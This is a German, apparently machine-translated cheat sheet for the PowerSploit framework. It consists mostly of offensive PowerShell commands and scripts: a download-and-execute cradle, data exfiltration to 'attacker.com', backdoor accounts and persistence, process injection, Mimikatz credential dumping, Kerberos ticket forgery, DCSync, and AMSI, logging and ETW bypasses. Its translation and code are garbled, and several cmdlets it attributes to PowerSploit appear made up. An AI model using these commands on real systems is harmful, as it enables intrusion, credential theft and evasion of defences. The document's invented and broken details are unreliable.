Zum Inhalt

PowerSploit Cheat Sheet

generieren

Überblick

PowerSploit ist eine Sammlung von Microsoft PowerShell-Modulen, die verwendet werden können, um Penetrationstester in allen Phasen einer Bewertung zu unterstützen. PowerSploit besteht aus folgenden Modulen: CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc und Recon. Jedes Modul enthält mehrere Funktionen, die verschiedene Fähigkeiten für Post-Exploitation-Aktivitäten bieten.

ZEIT Warning: Verwenden Sie nur PowerSploit in Umgebungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben. Unberechtigte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen.

Installation

Download von GitHub

```powershell

Download PowerSploit

Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"

Extract archive

Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

Navigate to PowerSploit directory

cd C:\Tools\PowerSploit-master\ ```_

Git Clone

```bash

Clone repository

git clone https://github.com/PowerShellMafia/PowerSploit.git

Navigate to directory

cd PowerSploit ```_

Import Module

```powershell

Import all modules

Import-Module .\PowerSploit.psd1

Import specific modules

Import-Module .\Recon\Recon.psd1 Import-Module .\Privesc\PowerUp.ps1 Import-Module .\Exfiltration\Exfiltration.psd1 Import-Module .\Persistence\Persistence.psd1

Import from URL (in-memory)

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') ```_

Bypass Execution Policy

```powershell

Bypass execution policy for current session

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser

Run with bypass

powershell -ExecutionPolicy Bypass -File script.ps1

Import with bypass

powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1" ```_

Recon Modul

PowerView Funktionen

```powershell

Import PowerView

Import-Module .\Recon\PowerView.ps1

Get domain information

Get-Domain Get-DomainController Get-DomainPolicy

Get forest information

Get-Forest Get-ForestDomain Get-ForestGlobalCatalog

Domain trust enumeration

Get-DomainTrust Get-ForestTrust Get-DomainTrustMapping

User enumeration

Get-DomainUser Get-DomainUser -Identity administrator Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))" Get-DomainUser -Properties samaccountname,description

Group enumeration

Get-DomainGroup Get-DomainGroup -Identity "Domain Admins" Get-DomainGroupMember -Identity "Domain Admins" Get-DomainGroup -AdminCount

Computer enumeration

Get-DomainComputer Get-DomainComputer -Operating System "Server" Get-DomainComputer -Ping Get-DomainComputer -Properties name,operatingsystem,serviceprincipalname ```_

Advanced PowerView Quers

```powershell

Find users with SPN (Kerberoastable)

Get-DomainUser -SPN

Find computers with unconstrained delegation

Get-DomainComputer -UnconstrainedDelegation

Find users with constrained delegation

Get-DomainUser -TrustedToAuth

Find ASREPRoastable users

Get-DomainUser -PreauthNotRequired

Find users with passwords not required

Get-DomainUser -PasswordNotRequired

Find users with passwords that don't expire

Get-DomainUser -PasswordNeverExpires

Find privileged users

Get-DomainUser -AdminCount Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

Find shares

Find-DomainShare Find-DomainShare -CheckShareAccess

Find interesting files

Find-InterestingDomainShareFile Find-InterestingDomainShareFile -Include .doc,.docx,.xls,.xlsx,.ppt,.pptx ```_

Sitzung und Lokale Adminzählung

```powershell

Find local admin access

Find-LocalAdminAccess Find-LocalAdminAccess -ComputerName "target-computer"

Find domain admin sessions

Find-DomainUserLocation Find-DomainUserLocation -UserIdentity "administrator"

Get logged on users

Get-NetLoggedon -ComputerName "target-computer" Get-NetSession -ComputerName "target-computer"

Get local groups

Get-NetLocalGroup -ComputerName "target-computer" Get-NetLocalGroupMember -ComputerName "target-computer" -GroupName "Administrators"

Process enumeration

Get-NetProcess -ComputerName "target-computer" ```_

ACL und Berechtigungen

```powershell

Get ACLs for objects

Get-ObjectAcl -Identity "Domain Admins" Get-ObjectAcl -Identity "administrator" -ResolveGUIDs

Find interesting ACLs

Find-InterestingDomainAcl Find-InterestingDomainAcl -ResolveGUIDs

Get path ACLs

Get-PathAcl -Path "\server\share"

Add ACL

Add-ObjectAcl -TargetIdentity "target-user" -PrincipalIdentity "attacker-user" -Rights DCSync ```_

Privesc Modul (PowerUp)

Grundlegende Vorrechte Eskalation

```powershell

Import PowerUp

Import-Module .\Privesc\PowerUp.ps1

Run all privilege escalation checks

Invoke-AllChecks

Run specific checks

Invoke-ServiceAbuse Invoke-PrivescAudit

Check for unquoted service paths

Get-ServiceUnquoted

Check for modifiable services

Get-ModifiableService

Check for modifiable service binaries

Get-ModifiableServiceFile

Check for always install elevated

Get-RegistryAlwaysInstallElevated

Check for auto logon credentials

Get-RegistryAutoLogon

Check for modifiable scheduled tasks

Get-ModifiableScheduledTaskFile ```_

Service Exploitation

```powershell

Abuse unquoted service paths

Write-ServiceBinary -Name "VulnService" -Path "C:\Program Files\Vuln Service\service.exe"

Abuse modifiable services

Invoke-ServiceAbuse -Name "VulnService" -Command "net user backdoor password123 /add"

Install service

Install-ServiceBinary -Name "BackdoorService" -Path "C:\Windows\Temp\backdoor.exe"

Restore service

Restore-ServiceBinary -Name "VulnService" ```_

DLL Hijacking

```powershell

Find DLL hijacking opportunities

Find-ProcessDLLHijack Find-PathDLLHijack

Write hijack DLL

Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -Command "net user backdoor password123 /add" ```_

Registrierung Exploitation

```powershell

Check for auto-elevate binaries

Get-ApplicationHost

Check for modifiable registry autoruns

Get-ModifiableRegistryAutoRun

Check for Unattend files

Get-UnattendedInstallFile

Check for web config files

Get-Webconfig

Check for cached GPP passwords

Get-CachedGPPPassword ```_

Persistenzmodul

Register Persistence

```powershell

Import Persistence module

Import-Module .\Persistence\Persistence.psd1

Add registry persistence

Add-Persistence -Method Registry -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "Backdoor" -PayloadPath "C:\Windows\Temp\backdoor.exe"

Add WMI persistence

Add-Persistence -Method WMI -EventName "ProcessStart" -PayloadPath "C:\Windows\Temp\backdoor.exe"

Add scheduled task persistence

Add-Persistence -Method ScheduledTask -TaskName "SystemUpdate" -PayloadPath "C:\Windows\Temp\backdoor.exe" -Trigger "Daily" ```_

WMI Persistence

```powershell

Install WMI backdoor

Install-WMIBackdoor -PayloadPath "C:\Windows\Temp\backdoor.exe"

Get WMI backdoor

Get-WMIBackdoor

Remove WMI backdoor

Remove-WMIBackdoor ```_

Benutzersuche

```powershell

Add user hunter

Add-UserHunter -UserName "administrator" -PayloadPath "C:\Windows\Temp\backdoor.exe"

Get user hunter

Get-UserHunter

Remove user hunter

Remove-UserHunter ```_

CodeExecution Modul

DLL Injection

```powershell

Import CodeExecution module

Import-Module .\CodeExecution\CodeExecution.psd1

Invoke DLL injection

Invoke-DllInjection -ProcessID 1234 -Dll "C:\Windows\Temp\payload.dll"

Invoke reflective PE injection

Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\payload.exe" -ProcessID 1234

Invoke shellcode injection

Invoke-Shellcode -Shellcode $shellcode -ProcessID 1234 ```_

Ausführung des Speichers

```powershell

Execute PE in memory

Invoke-ReflectivePEInjection -PEBytes $PEBytes

Execute shellcode

$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...) Invoke-Shellcode -Shellcode $shellcode

Invoke mimikatz in memory

Invoke-Mimikatz Invoke-Mimikatz -Command "sekurlsa::logonpasswords" ```_

Exfiltrationsmodul

Daten Exfiltration

```powershell

Import Exfiltration module

Import-Module .\Exfiltration\Exfiltration.psd1

Exfiltrate via DNS

Invoke-DNSExfiltration -Data "sensitive data" -Domain "attacker.com"

Exfiltrate via ICMP

Invoke-ICMPExfiltration -Data "sensitive data" -Target "attacker-ip"

Exfiltrate via HTTP

Invoke-HTTPExfiltration -Data "sensitive data" -URL "http://attacker.com/upload"

Get clipboard contents

Get-ClipboardContents

Get keystrokes

Get-Keystrokes -LogPath "C:\Windows\Temp\keylog.txt"

Take screenshots

Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30 ```_

Credential Harvesting

```powershell

Get stored credentials

Get-VaultCredential Get-LSASecret

Dump SAM database

Get-SAMHashes

Get cached domain credentials

Get-CachedRDPConnection

Invoke credential prompt

Invoke-CredentialInjection ```_

AntivirusBypass Modul

AV Evanation

```powershell

Import AntivirusBypass module

Import-Module .\AntivirusBypass\AntivirusBypass.psd1

Find AV processes

Find-AVSignature

Disable Windows Defender

Disable-WindowsDefender

Bypass AMSI

Invoke-AMSIBypass

Obfuscate script

Out-ObfuscatedAst -ScriptPath "script.ps1" ```_

ScriptModifikation Modul

Script Obfuscation

```powershell

Import ScriptModification module

Import-Module .\ScriptModification\ScriptModification.psd1

Obfuscate PowerShell script

Out-EncodedCommand -ScriptBlock \\{Get-Process\\}

Compress and encode script

Out-CompressedDll -ScriptPath "script.ps1"

Minify script

Out-MinimizedScript -ScriptPath "script.ps1" ```_

Mayhem Modul

Systemstörung

```powershell

Import Mayhem module

Import-Module .\Mayhem\Mayhem.psd1

Set wallpaper

Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"

Set critical process

Set-CriticalProcess -ProcessName "notepad"

Add machine account to domain

Add-MachineAccountQuota -MachineAccount "FAKE01" -Password "password123" ```_

Erweiterte Techniken

Kerberoasen

```powershell

Find Kerberoastable users

Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname

Request service tickets

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web.domain.com"

Export tickets for cracking

Invoke-Mimikatz -Command "kerberos::list /export" ```_

ASREPRoasing

```powershell

Find ASREPRoastable users

Get-DomainUser -PreauthNotRequired|Select-Object samaccountname

Request AS-REP for user without pre-auth

Get-ASREPHash -UserName "vulnerable-user" -Domain "domain.com" ```_

Golden Ticket Angriff

```powershell

Get domain SID

Get-DomainSID

Create golden ticket (requires krbtgt hash)

Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

Import golden ticket

Invoke-Mimikatz -Command "kerberos::ptt golden.kirbi" ```_

Silber Ticket Angriff

```powershell

Create silver ticket (requires service account hash)

Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /target:server.domain.com /service:cifs /rc4:hash /ticket:silver.kirbi"

Import silver ticket

Invoke-Mimikatz -Command "kerberos::ptt silver.kirbi" ```_

DCSync Attack

```powershell

Perform DCSync (requires replication rights)

Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:krbtgt" Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:administrator"

DCSync all users

Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /all" ```_

Automatisierungsskripte

Domain Enumeration Script

```powershell

!/usr/bin/env powershell

PowerSploit Domain Enumeration Script

param( [string]$Domain = \(env:USERDNSDOMAIN, [string]\)OutputDir = "C:\temp\enum" )

Create output directory

if (!(Test-Path $OutputDir)) \\{ New-Item -ItemType Directory -Path $OutputDir -Force \\}

Import PowerView

Import-Module .\Recon\PowerView.ps1

Write-Host "[+] Starting domain enumeration for: $Domain"

try \\{ # Domain information Write-Host "[+] Collecting domain information..." Get-Domain -Domain \(Domain|Out-File "\)OutputDir\domain_info.txt" Get-DomainController -Domain \(Domain|Out-File "\)OutputDir\domain_controllers.txt" Get-DomainPolicy -Domain \(Domain|Out-File "\)OutputDir\domain_policy.txt"

# Users
Write-Host "[+] Enumerating users..."
Get-DomainUser -Domain $Domain|Out-File "$OutputDir\users.txt"
Get-DomainUser -Domain $Domain -AdminCount|Out-File "$OutputDir\privileged_users.txt"
Get-DomainUser -Domain $Domain -SPN|Out-File "$OutputDir\kerberoastable_users.txt"
Get-DomainUser -Domain $Domain -PreauthNotRequired|Out-File "$OutputDir\asreproastable_users.txt"

# Groups
Write-Host "[+] Enumerating groups..."
Get-DomainGroup -Domain $Domain|Out-File "$OutputDir\groups.txt"
Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain|Out-File "$OutputDir\domain_admins.txt"
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain|Out-File "$OutputDir\enterprise_admins.txt"

# Computers
Write-Host "[+] Enumerating computers..."
Get-DomainComputer -Domain $Domain|Out-File "$OutputDir\computers.txt"
Get-DomainComputer -Domain $Domain -UnconstrainedDelegation|Out-File "$OutputDir\unconstrained_delegation.txt"

# Trusts
Write-Host "[+] Enumerating trusts..."
Get-DomainTrust -Domain $Domain|Out-File "$OutputDir\domain_trusts.txt"
Get-ForestTrust|Out-File "$OutputDir\forest_trusts.txt"

# Shares
Write-Host "[+] Finding shares..."
Find-DomainShare -Domain $Domain|Out-File "$OutputDir\shares.txt"

Write-Host "[+] Enumeration completed. Results saved to: $OutputDir"

\\} catch \\{ Write-Error "[-] Enumeration failed: \((\).Exception.Message)" \\} ```

Vorrechte Eskalation Überprüfen Sie das Skript

```powershell

!/usr/bin/env powershell

PowerSploit Privilege Escalation Check

param( [string]$OutputFile = "C:\temp\privesc_results.txt" )

Import PowerUp

Import-Module .\Privesc\PowerUp.ps1

Write-Host "[+] Starting privilege escalation checks..."

try \\{ # Run all checks and save to file Invoke-AllChecks|Tee-Object -FilePath $OutputFile

Write-Host "[+] Privilege escalation checks completed"
Write-Host "[+] Results saved to: $OutputFile"

# Check for immediate wins
$results = Get-Content $OutputFile

if ($results -match "Unquoted Service Path") \\\\{
    Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
\\\\}

if ($results -match "Modifiable Service") \\\\{
    Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
\\\\}

if ($results -match "AlwaysInstallElevated") \\\\{
    Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
\\\\}

\\} catch \\{ Write-Error "[-] Privilege escalation checks failed: \((\).Exception.Message)" \\} ```

Erstellendes Löschen von Skript

```powershell

!/usr/bin/env powershell

PowerSploit Credential Harvesting Script

param( [string]$OutputDir = "C:\temp\creds" )

Create output directory

if (!(Test-Path $OutputDir)) \\{ New-Item -ItemType Directory -Path $OutputDir -Force \\}

Import modules

Import-Module .\Exfiltration\Exfiltration.psd1 Import-Module .\CodeExecution\CodeExecution.psd1

Write-Host "[+] Starting credential harvesting..."

try \\{ # Mimikatz - dump credentials Write-Host "[+] Running Mimikatz..." Invoke-Mimikatz -Command "sekurlsa::logonpasswords"|Out-File "\(OutputDir\logonpasswords.txt" Invoke-Mimikatz -Command "sekurlsa::wdigest"|Out-File "\)OutputDir\wdigest.txt" Invoke-Mimikatz -Command "sekurlsa::kerberos"|Out-File "\(OutputDir\kerberos.txt" Invoke-Mimikatz -Command "sekurlsa::tspkg"|Out-File "\)OutputDir\tspkg.txt"

# Registry secrets
Write-Host "[+] Extracting registry secrets..."
Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
Get-CachedGPPPassword|Out-File "$OutputDir\gpp_passwords.txt"

# Vault credentials
Write-Host "[+] Extracting vault credentials..."
Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"

# Browser credentials
Write-Host "[+] Extracting browser credentials..."
Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"

Write-Host "[+] Credential harvesting completed"
Write-Host "[+] Results saved to: $OutputDir"

\\} catch \\{ Write-Error "[-] Credential harvesting failed: \((\).Exception.Message)" \\} ```

Evasion Techniken

AMSI Bypass

```powershell

Method 1: Reflection

\(a = [Ref].Assembly.GetTypes() | | \(a | ForEach-Object \\\\{\)_.GetMethods() | ForEach-Object \\\\{if(\)_.Name -like "AmsiInitialize") \\{\(_.Invoke(\)null, @($null, 0))\\}\\}\\} | |

Method 2: Memory patching

$Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 \\{ [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); \\} "@

Add-Type $Win32 $LoadLibrary = Win32::LoadLibrary("amsi.dll") \(Address = [Win32]::GetProcAddress(\)LoadLibrary, "AmsiScanBuffer") $p = 0

$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

```_

PowerShell Logging Bypass

```powershell

Disable PowerShell logging

$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static') \(GPO.SetValue(\)null, @\\{\\})

Disable script block logging

$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings() $settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0 ```_

ETW Bypass

```powershell

Disable ETW

$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider') \(etwProvider = \(Provider.GetField('etwProvider','NonPublic,Static').GetValue(\)null) [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue(\)etwProvider,0) ```_

Integrationsbeispiele

Cobalt Strike Integration

```powershell

PowerView integration with Cobalt Strike

beacon> powershell-import /path/to/PowerView.ps1 beacon> powershell Get-DomainUser -AdminCount beacon> powershell Find-LocalAdminAccess

PowerUp integration

beacon> powershell-import /path/to/PowerUp.ps1 beacon> powershell Invoke-AllChecks

Mimikatz integration

beacon> powershell Invoke-Mimikatz -Command "sekurlsa::logonpasswords" ```_

Integrieren der Welt

```powershell

Use PowerSploit modules in Empire

(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user (Empire: agents) > usemodule powershell/privesc/powerup/allchecks (Empire: agents) > usemodule powershell/credentials/mimikatz/logonpasswords ```_

Metasploit Integration

```bash

Use PowerSploit with Metasploit

meterpreter > load powershell meterpreter > powershell_import /path/to/PowerView.ps1 meterpreter > powershell_execute "Get-DomainUser -AdminCount"

Post-exploitation modules

use post/windows/gather/enum_domain use post/windows/escalate/getsystem use post/windows/gather/credentials/credential_collector ```_

Fehlerbehebung

Ausführungsrichtlinien

```powershell

Check current execution policy

Get-ExecutionPolicy

Set execution policy

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Bypass for single command

powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

Use encoded commands

$command = "Import-Module .\PowerSploit.psd1" \(bytes = [System.Text.Encoding]::Unicode.GetBytes(\)command) \(encodedCommand = [Convert]::ToBase64String(\)bytes) powershell -EncodedCommand $encodedCommand ```_

AMSI-Detektion

```powershell

Test AMSI detection

'Invoke-Mimikatz' # Should trigger AMSI

Obfuscate strings

$cmd = 'Inv' + 'oke-Mim' + 'ikatz' Invoke-Expression $cmd

Use variables

$a = 'Invoke-' \(b = 'Mimikatz' Invoke-Expression (\)a + $b) ```_

Modul Import Issues

```powershell

Force import

Import-Module .\PowerSploit.psd1 -Force

Import with full path

Import-Module "C:\Tools\PowerSploit\PowerSploit.psd1"

Check module path

$env:PSModulePath

Add to module path

$env:PSModulePath += ";C:\Tools\PowerSploit" ```_

Network Connectivity Issues

```powershell

Test network connectivity

Test-NetConnection -ComputerName "target" -Port 445

Check firewall

Get-NetFirewallRule|Where-Object \\{$_.Enabled -eq "True"\\}

Use alternative ports

Get-DomainController -Server "dc.domain.com:389" ```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von PowerSploit für Windows Penetrationstests und Post-Exploitation. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *